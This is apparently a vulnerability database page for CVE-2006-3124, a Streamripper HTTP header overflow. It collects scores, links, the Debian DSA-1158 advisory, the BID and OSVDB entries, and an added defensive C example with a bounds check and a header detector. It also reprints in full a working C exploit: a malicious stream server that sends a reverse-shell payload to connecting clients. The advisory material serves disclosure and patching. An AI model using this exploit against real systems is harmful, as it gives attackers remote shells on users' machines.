CVE-2006-3124
CVSS 7.5
Published: 2006-08-26 17:04:00
Last revised: 2011-03-07 21:37:52

[Original] Buffer overflow in the HTTP header parsing in Streamripper before 1.61.26 allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted HTTP headers.


[CNNVD] Streamripper HTTP Header Parsing Buffer Overflow Vulnerability (CNNVD-200608-420)

        StreamRipper saves MP3 streams from the Internet to disk and is commonly used to record online MP3 radio.
        StreamRipper has a buffer overflow when handling certain HTTP header fields returned by the server; a remote attacker may exploit it to execute arbitrary instructions on the user's machine.
        The vulnerability is triggered if the user is tricked into connecting to a malicious server set up by the attacker, leading to arbitrary code execution.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance degradation or interrupted access to resources possible]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:streamripper:streamripper:1.61.25
cpe:/a:streamripper:streamripper:1.61.24

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3124
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3124
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200608-420
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/19707
(PATCH)  BID  19707
http://sourceforge.net/project/shownotes.php?release_id=442126
(PATCH)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=442126
http://secunia.com/advisories/21579
(VENDOR_ADVISORY)  SECUNIA  21579
http://xforce.iss.net/xforce/xfdb/28567
(UNKNOWN)  XF  streamripper-httpheader-bo(28567)
http://www.vupen.com/english/advisories/2006/3387
(UNKNOWN)  VUPEN  ADV-2006-3387
http://www.novell.com/linux/security/advisories/2006_21_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2006:021
http://www.debian.org/security/2006/dsa-1158
(UNKNOWN)  DEBIAN  DSA-1158
http://security.gentoo.org/glsa/glsa-200609-01.xml
(UNKNOWN)  GENTOO  GLSA-200609-01
http://secunia.com/advisories/21801
(UNKNOWN)  SECUNIA  21801
http://secunia.com/advisories/21658
(UNKNOWN)  SECUNIA  21658
http://www.osvdb.org/28178
(UNKNOWN)  OSVDB  28178
http://secunia.com/advisories/21749
(UNKNOWN)  SECUNIA  21749
http://downloads.securityfocus.com/vulnerabilities/exploits/streamripper-aug292006.c
(UNKNOWN)  MISC  http://downloads.securityfocus.com/vulnerabilities/exploits/streamripper-aug292006.c

- Vulnerability information

Streamripper HTTP Header Parsing Buffer Overflow Vulnerability
High severity, buffer overflow
Published: 2006-08-26 00:00:00  Updated: 2006-09-19 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade that fixes this issue; download it from the vendor's homepage:
        http://sourceforge.net/project/showfiles.php?group_id=6172

- Vulnerability information (EDB 2274)

Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit (EDBID:2274)
Platform: linux  Type: remote
Date: 2006-08-29  Verified
Author: Expanders
/*
       _______         ________           .__        _____          __
___  __\   _  \   ____ \_____  \          |  |__    /  |  |   ____ |  | __
\  \/  /  /_\  \ /    \  _(__  <   ______ |  |  \  /   |  |__/ ___\|  |/ /
 >    <\  \_/   \   |  \/       \ /_____/ |   Y  \/    ^   /\  \___|    <
/__/\_ \\_____  /___|  /______  /         |___|  /\____   |  \___  >__|_ \
      \/      \/     \/       \/   29\08\06    \/      |__|      \/     \/
      
 *   mm.           dM8
 *  YMMMb.       dMM8      _____________________________________
 *   YMMMMb     dMMM'     [                                     ]
 *    `YMMMb   dMMMP      [ There are doors I have yet to open  ]
 *      `YMMM  MMM'       [ windows I have yet to look through  ]
 *         "MbdMP         [ Going forward may not be the answer ]
 *     .dMMMMMM.P         [                                     ]
 *    dMM  MMMMMM         [       maybe I should go back        ]
 *    8MMMMMMMMMMI        [_____________________________________]
 *     YMMMMMMMMM                   www.netbunny.org
 *       "MMMMMMP
 *      MxM .mmm
 *      W"W """

[i] Title:              Streamripper HTTP Header Parsing Buffer Overflow Exploit
[i] Discovered by:      Ulf Harnhammar
[i] Exploit by:         Expanders
[i] References:         http://www.securityfocus.com/bid/19707   ---   http://streamripper.sourceforge.net/
[i] Greetings:          x0n3-h4ck - netbunny - my girlfriend..thanks for existing

[ Why does streamripper crash? ]

Streamripper, like any other shoutcast client, sends an HTTP GET request to the stream server and then receives a pseudo-HTTP response.
The response is made of an ICY [CODE] that shows the status of the remote daemon, and a few icy- headers that store radio information
like Title - Website - Genre - Bitrate, and a special header for the song-title offset in the content stream.

in lib/http.c [httplib_parse_sc_header()]

[code segment]
....
char stempbr[50];
....
rc = extract_header_value(header, stempbr, "icy-br:");
....
[/code segment]

extract_header_value(...) calls subnstr_until(const char *str, char *until, char *newstr, int maxlen), which copies from [*str] to [*newstr], trimming
everything after [*until], for a maximum of [maxlen] bytes.

in streamripper-1.61.25 ( maybe prior versions ) the MAX_ICY_STRING constant is passed as [maxlen].

in lib/lib/srtypes.h

#define MAX_ICY_STRING          4024

Putting it all together, if we send an icy-br: header 156 bytes long we reach EIP overwriting.

Code execution is obviously possible.

[ Timeline ]

Vendor has been informed and version 1.61.26 has been released.

[ Notes ]

The exploit uses shitty hardcoded addresses; there are no registers that point to a useful location, so virtual address exploiting isn't possible.
Probably some better solution can be used but I'm really too lazy and busy to fuck my mind with that.

[ Links ]

www.x0n3-h4ck.org
www.netbunny.org



*/

#include <stdio.h>
#include <stdlib.h>      /* exit, malloc, free, atoi */
#include <string.h>      /* memcpy, memset, strlen, strstr */
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr, inet_ntoa */
#include <netdb.h>
#include <unistd.h>

#define BUFFSIZE 200 // Buffer size

int banner();
int usage(char *filename);
int inject(char *port, char *ip);
int remote_connect( char* ip, unsigned short port );


/* linux_ia32_reverse -  Size=70 Encoder=None( hahaha streaming has no restricted 0x00 ) http://metasploit.com */
unsigned char shellcode[] =
                      "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
                      "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68"
                      "\x00\x00\x00\x00" // IP
                      "\x66\x68"
                      "\x00\x00" // PORT
                      "\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
                      "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
                      "\x89\xe1\xb0\x0b\xcd\x80";

char http_header[] =  "ICY 200 OK\r\n"
                      "icy-notice1:<BR>This stream requires <a href=\"http://www.winamp.com/\">Winamp</a><BR>\r\n"
                      "icy-notice2:SHOUTcast Distributed Network Audio Server/unix v1.9.7<BR>\r\n"
                      "icy-name:SEGFAULT radio\r\n"
                      "icy-genre:Progressive House\r\n"
                      "icy-url:http://www.x0n3-h4ck.org\r\n"
                      "content-type:audio/mpeg\r\n"
                      "icy-pub:1\r\n"
                      "icy-metaint:1\r\n" // mp3 metatags starts at first byte of content
                      "icy-br:"; // Finally here...

char http_content[] = "\x0d\x0a\x0d\x0a" // \r\n\r\n
                      "\x04" // this magic byte can be used to control malloc(m_buffersize). m_buffersize is (this-byte * 16 ) TODO: egghunter
                      "\x53\x74\x72\x65\x61\x6D\x54\x69\x74\x6C\x65\x3D\x27\x45"
                      "\x78\x70\x61\x6E\x64\x65\x72\x73\x20\x2D\x20\x49\x27\x6C"
                      "\x6C\x20\x4F\x77\x6E\x20\x59\x6F\x75\x27\x3B\x53\x74\x72"
                      "\x65\x61\x6D\x55\x72\x6C\x3D\x27\x27\x3B\x00\x00\x00\x00"
                      "\x00\x00\x00\x00\x00\x00\x00\x00"
                      "\xd3\xff\xff\xf5\xff\xff\xf9\xaf\xff\xe5\x29\xbe\x3e\x8b\x18"; // a few bytes from an mp3


struct retcodes { char *platform; unsigned long addr; } targets[] = {
        { "Debian GNU/Linux testing/unstable", 0xb7e70090 },
        { "Debian GNU/Linux 3.1",              0xb7e71070 },
        { "Crash daemon - DEBUGGING",          0xdeadc0de },
        { NULL, 0 }
};
int banner() {
  printf("\n[i] Title:        \tStreamripper HTTP Header Parsing BOF Exploit\n");
  printf("[i] Discovered by:\tUlf Harnhammar\n");
  printf("[i] Exploit by:   \tExpanders\n\n");
  return 0;
}

int usage(char *filename) {
  int i;
  printf("Usage: \t%s <port> <l_ip> <l_port> <targ>\n\n",filename);
  printf("       \t<port>   : Local port for listener  ::  Default: 8000\n");
  printf("       \t<l_ip>   : Local ip address for connectback\n");
  printf("       \t<l_port> : Local port for connectback\n");
  printf("       \t<targ>   : Target from the list below\n\n");
  
  printf("#   \t Address  \t Target\n");
  printf("---------------------------------------------------------\n");
  for(i = 0; targets[i].platform; i++)
        printf("%d \t 0x%08lx \t %s \n", i, targets[i].addr, targets[i].platform);
  printf("---------------------------------------------------------\n");
  exit(0);
}

int inject(char *port, char *ip)
{
    unsigned long m_ip;
    unsigned short m_port;
    m_ip = inet_addr(ip);
    m_port = htons(atoi( port ));
    memcpy ( &shellcode[26], &m_ip, 4);
    memcpy ( &shellcode[32], &m_port, 2);
    return 0;
}

int socket_listen( unsigned short port )
{
  int s, reuseaddr = 1;
  struct sockaddr_in localaddr;

  memset(&localaddr, 0, sizeof(localaddr));
  localaddr.sin_family = AF_INET;
  localaddr.sin_port = htons(port);
  localaddr.sin_addr.s_addr = INADDR_ANY;

  if ( ( s = socket(AF_INET, SOCK_STREAM, 0) ) < 0 )
  {
   printf ( "[X] socket() failed!\n" );
   exit ( 1 );
  }
  if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &reuseaddr,(socklen_t)sizeof(reuseaddr)) < 0)
  {
   printf("[X] setsockopt() failed!\n");
   exit ( 1 );
  }
  if (bind(s, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0) 
  {
   perror("[X] bind() failed\n");
   exit ( 1 );
  }
  if (listen(s, 1) < 0)
  {
   perror("[X] listen() failed\n");
   exit ( 1 );
  }
  return ( s );
}

int client_accept( int listener )
{
  int s;
  struct sockaddr_in remoteaddr;
  socklen_t addrlen = sizeof(struct sockaddr_in);
  if ((s = accept(listener, (struct sockaddr *)&remoteaddr, &addrlen)) < 0)
  {
   perror("[X] accept() failed\n");
   exit ( 1 );
  }
  if (getpeername(s, (struct sockaddr *)&remoteaddr, &addrlen) < 0)
  {
   perror("[X] getpeername() failed\n");
   exit ( 1 );
  }
  printf("got connection from %s:%u\n", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port));
  return ( s );
}


int main(int argc, char *argv[]) {
    int listener, client, target, position = 0;
    ssize_t rcv;                       /* recv() returns -1 on error, so this must be signed */
    char buffer[BUFFSIZE], *request;
    char recvbuf[256];
    banner();
    if( (argc != 5) || (atoi(argv[1]) < 1) || (atoi(argv[1]) > 65534) )
        usage(argv[0]);
    target = atoi(argv[4]);
    if (target < 0 || target >= (int)(sizeof(targets) / sizeof(targets[0])) - 1) {
        printf("[X] Unknown target %s\n\n", argv[4]);   /* last entry is the NULL sentinel */
        usage(argv[0]);
    }

    printf("[+] Creating evil buffer\n");
    /* header + 156 bytes of nops/shellcode + 4-byte return address + NUL + content */
    request = (char *) malloc(BUFFSIZE + strlen(http_header) + strlen(http_content) + 1);
    if (request == NULL)
    {
     printf("[X] malloc() failed\n");
     exit( 1 );
    }
    memset(buffer,0x90,BUFFSIZE);  // Fill with nops

    inject(argv[3],argv[2]);     // Patch the connect-back ip and port into the shellcode
    /* NOTE: the payload is assembled with sprintf()/strlen() below, so a connect-back
       ip or port that contains a 0x00 byte (e.g. 10.0.0.1) truncates the shellcode.
       Pick a listener address and port without zero bytes. */

    position = 156 - strlen(shellcode);   // 156 : EIP offset
    memcpy(buffer+position,shellcode,strlen(shellcode));
    position += strlen(shellcode);
    memcpy(buffer+position,&targets[target].addr,4);   // low 4 bytes: little-endian return address
    position += 4;
    buffer[position] = 0x00;   // End: sprintf stops here
    sprintf(request,"%s%s%s",http_header,buffer,http_content);

    printf("[+] Setting up socket\n");
    listener = socket_listen(atoi(argv[1]));

    printf("[+] Waiting for client...");
    fflush(stdout);
    client = client_accept(listener);

    printf("[+] Receiving GET request...");
    fflush(stdout);
    rcv = recv(client, recvbuf, sizeof(recvbuf) - 1, 0);
    if(rcv <= 0)
    {
     printf("\n[X] Error while receiving request!\n");
     close(client);
     close(listener);
     exit( 1 );
    }
    recvbuf[rcv] = '\0';   // strstr() needs a terminated string
    if (strstr(recvbuf,"1.61.25") != NULL)   // the GET request carries the client version
    {
     sleep(1);
     printf("ok\n[+] Sending %zu bytes of painful buffer\n",strlen(request));
     if ( send ( client, request, strlen (request), 0) <= 0 )
     {
            printf("[X] Failed to send buffer\n");
            exit ( 1 );
     }
     printf("[+] Done - Wait for shell on port %s\n",argv[3]);
    } else
      printf("[X] This client is not running Streamripper or it's an unsupported version\n");
    close(client);
    close(listener);
    free(request);
    return 0;
}

// milw0rm.com [2006-08-29]
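The header-parsing bug the exploit's analysis walks through (a 50-byte stempbr filled by extract_header_value() through subnstr_until() with MAX_ICY_STRING, 4024, as the only bound, so a 156-byte icy-br: value reaches the saved return address), as an added example in C. This is not Streamripper's code and not part of the exploit: the function bodies, the header walker, the ICY responses and the detection check are my own assumptions; only the function names, the 50-byte buffer, the 4024 constant and the 156-byte offset come from the page. It shows the vulnerable call's copy length beside a bounded replacement that reports truncation, and the check a proxy or IDS could run over a captured ICY response.

```c
/*
 * Added example, not Streamripper's code and not part of the exploit above.
 * It models the icy-br: extraction the exploit's analysis describes (a 50-byte
 * stempbr filled through extract_header_value()/subnstr_until() with
 * MAX_ICY_STRING as the bound), puts a bounded replacement beside it, and adds
 * the check a proxy or IDS could run on an ICY response. Function bodies and
 * the test responses are assumptions; the names, the 50-byte buffer, the 4024
 * constant and the 156-byte EIP offset are taken from the page.
 */
#include <stdio.h>
#include <string.h>

#define MAX_ICY_STRING 4024   /* lib/srtypes.h, as quoted in the analysis */
#define STEMPBR_SIZE   50     /* char stempbr[50] in httplib_parse_sc_header() */
#define EIP_OFFSET     156    /* icy-br: value length that reaches the saved EIP */

/* Bytes the modelled subnstr_until(str, until, dest, maxlen) would copy:
   everything before the delimiter, capped at maxlen. No write is performed. */
static size_t subnstr_until_len(const char *str, const char *until, size_t maxlen)
{
    const char *end = strstr(str, until);
    size_t n = end ? (size_t)(end - str) : strlen(str);
    return n < maxlen ? n : maxlen;
}

/* Find `key` at the start of a header line; return the value start or NULL.
   Stops at the blank line that ends the header block. */
static const char *find_header(const char *header, const char *key)
{
    size_t klen = strlen(key);
    const char *p = header;
    while (p && *p && strncmp(p, "\r\n", 2) != 0) {
        if (strncmp(p, key, klen) == 0)
            return p + klen;
        p = strstr(p, "\r\n");
        if (p) p += 2;
    }
    return NULL;
}

/* How many bytes extract_header_value(header, stempbr, key) writes into
   stempbr[50] when MAX_ICY_STRING is the only bound: >= STEMPBR_SIZE smashes
   the stack, EIP_OFFSET bytes reach the return address. */
size_t vulnerable_copy_len(const char *header, const char *key)
{
    const char *v = find_header(header, key);
    return v ? subnstr_until_len(v, "\r\n", MAX_ICY_STRING) : 0;
}

/* Hardened extraction: the bound is the destination size and truncation is
   reported, so the caller can drop the stream instead of using a cut value.
   Returns 1 on success, 0 if the header is absent, -1 if truncated. */
int extract_header_value_safe(const char *header, const char *key,
                              char *dest, size_t destsize)
{
    const char *v = find_header(header, key);
    if (!v || destsize == 0)
        return 0;
    size_t full = subnstr_until_len(v, "\r\n", (size_t)-1);
    size_t n = full < destsize - 1 ? full : destsize - 1;
    memcpy(dest, v, n);
    dest[n] = '\0';
    return full > n ? -1 : 1;
}

/* Detection: offset of the first header line whose value (text after the
   first ':') is at least `limit` bytes, or -1 if none. */
long find_oversized_header(const char *response, size_t limit)
{
    const char *p = response;
    while (p && *p && strncmp(p, "\r\n", 2) != 0) {
        const char *eol = strstr(p, "\r\n");
        size_t linelen = eol ? (size_t)(eol - p) : strlen(p);
        const char *colon = memchr(p, ':', linelen);
        if (colon && linelen - (size_t)(colon + 1 - p) >= limit)
            return (long)(p - response);
        p = eol ? eol + 2 : NULL;
    }
    return -1;
}

/* Constructed ICY response whose icy-br: value is value_len 'A' bytes. */
void build_icy_response(char *out, size_t outsize, size_t value_len)
{
    size_t n = (size_t)snprintf(out, outsize, "ICY 200 OK\r\nicy-name:SEGFAULT radio\r\nicy-br:");
    while (value_len-- > 0 && n + 1 < outsize)
        out[n++] = 'A';
    snprintf(out + n, outsize - n, "\r\nicy-metaint:8192\r\n\r\n");
}

int main(void)
{
    char benign[256], evil[512], val[STEMPBR_SIZE];
    build_icy_response(benign, sizeof benign, 3);            /* icy-br:AAA */
    build_icy_response(evil, sizeof evil, EIP_OFFSET);       /* icy-br: followed by 156 'A's */
    printf("benign icy-br copies %zu bytes into stempbr[%d]\n",
           vulnerable_copy_len(benign, "icy-br:"), STEMPBR_SIZE);
    printf("crafted icy-br copies %zu bytes into stempbr[%d]\n",
           vulnerable_copy_len(evil, "icy-br:"), STEMPBR_SIZE);
    printf("safe extraction of crafted value returns %d\n",
           extract_header_value_safe(evil, "icy-br:", val, sizeof val));
    printf("first oversized header at offset %ld\n",
           find_oversized_header(evil, STEMPBR_SIZE));
    return 0;
}
```

The -1 from extract_header_value_safe() is the signal to abort the rip rather than carry on with a truncated bitrate; the offset from find_oversized_header() points at the offending header line, which is what you would log or alert on when watching stream traffic for this class of client-side overflow.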
		

- Vulnerability information (Packet Storm F49490)

Debian Linux Security Advisory 1158-1 (PacketStormID:F49490)
2006-08-28 00:00:00
Debian  debian.org
advisory,overflow,arbitrary
linux,debian
CVE-2006-3124

Debian Security Advisory 1158-1 - Ulf Harnhammer from the Debian Security Audit Project discovered that streamripper, a utility to record online radio-streams, performs insufficient sanitizing of data received from the streaming server, which might lead to buffer overflows and the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1158-1                    security@debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
August 25th, 2006                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : streamripper
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-3124

Ulf Harnhammer from the Debian Security Audit Project discovered that
streamripper, a utility to record online radio-streams, performs
insufficient sanitising of data received from the streaming server,
which might lead to buffer overflows and the execution of arbitrary
code.

For the stable distribution (sarge) this problem has been fixed in
version 1.61.7-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 1.61.25-2.

We recommend that you upgrade your streamripper package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1.dsc
      Size/MD5 checksum:      684 81c2011992a47019464e689e62a0e2fc
    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1.diff.gz
      Size/MD5 checksum:     2748 a55c6752bf1f5cd184516e018f7b1d5b
    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7.orig.tar.gz
      Size/MD5 checksum:   245448 87e16d42fb7625525eafe769edd2e9b3

  Alpha architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_alpha.deb
      Size/MD5 checksum:    62730 a11cd910042103cd75a229468e786a25

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_amd64.deb
      Size/MD5 checksum:    55886 93a8ab72c2a969b8eee99c9e105d8ad1

  ARM architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_arm.deb
      Size/MD5 checksum:    51734 3d19a4711f9373be5630e1024f515ddc

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_i386.deb
      Size/MD5 checksum:    51694 cb59ef062ca1ca0c74a5b7359d2b5acd

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_ia64.deb
      Size/MD5 checksum:    68218 ff13f983398a4694350916f4d44a817c

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_hppa.deb
      Size/MD5 checksum:    57016 aad39a310b38f131840929345cf50d6b

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_m68k.deb
      Size/MD5 checksum:    47922 a19ab1dd7fb150ae73fce92e519ab94e

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_mips.deb
      Size/MD5 checksum:    57088 b90697a7aecf7c2d838bdfae4af1ccc5

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_mipsel.deb
      Size/MD5 checksum:    57490 0f1fbaeeec94a7f4c4d1340e68d611bb

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_powerpc.deb
      Size/MD5 checksum:    55912 b2590326f71ddb6f9bf44fc933b28c50

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_s390.deb
      Size/MD5 checksum:    55456 60afcd68f13f131040c68cde36f4464a

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_sparc.deb
      Size/MD5 checksum:    51266 73736226d97be58202e1619518e3ae25


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFE8fpPXm3vHE4uyloRAh3jAKC8gR3uGCnV1O0j8d0usIMdSvUdIwCgySom
345IV3yRd0ZZ+Ql1Bsn3HCg=
=XMei
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

- Vulnerability information (OSVDB 28178)

28178
Streamripper HTTP Header Parsing Overflow
Remote / Network Access, Input Manipulation
Loss of Integrity
Exploit Public, Vendor Verified

- Description

A remote overflow exists in Streamripper. The product fails to check for boundary errors while processing certain HTTP headers, resulting in a buffer overflow. With a specially crafted server response, an attacker can execute arbitrary code, resulting in a loss of integrity.

- Timeline

2006-08-24 Unknown
2006-08-24 Unknown

- Solution

Upgrade to version 1.61.26 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Credit

- Vulnerability information (BID 19707)

Streamripper HTTP Header Parsing Buffer Overflow Vulnerability
Class: Boundary Condition Error  Bugtraq ID: 19707
Remote: Yes  Local: No
Published: 2006-08-25 12:00:00  Updated: 2006-10-17 11:19:00
Ulf Harnhammar discovered this issue.

- Affected versions

Streamripper Streamripper 1.61.25
Streamripper Streamripper 1.61.24
Streamripper Streamripper 1.61.17
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1

- Unaffected versions

Streamripper Streamripper 1.61.26

- Discussion

Streamripper is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input data before copying it to an insufficiently sized memory buffer.

An attacker may cause malicious code to execute by forcing the application to parse malformed HTTP headers, with the privileges of the user running the application.

- Exploit

Exploit code is available: see the Exploit-DB entry (EDBID 2274) above and the streamripper-aug292006.c file referenced in the links section.

- Solution

The vendor has released version 1.61.26 to address this issue.

Please see the referenced advisories for more information.


Streamripper Streamripper 1.61.17

Streamripper Streamripper 1.61.24

Streamripper Streamripper 1.61.25

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China centred on SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites.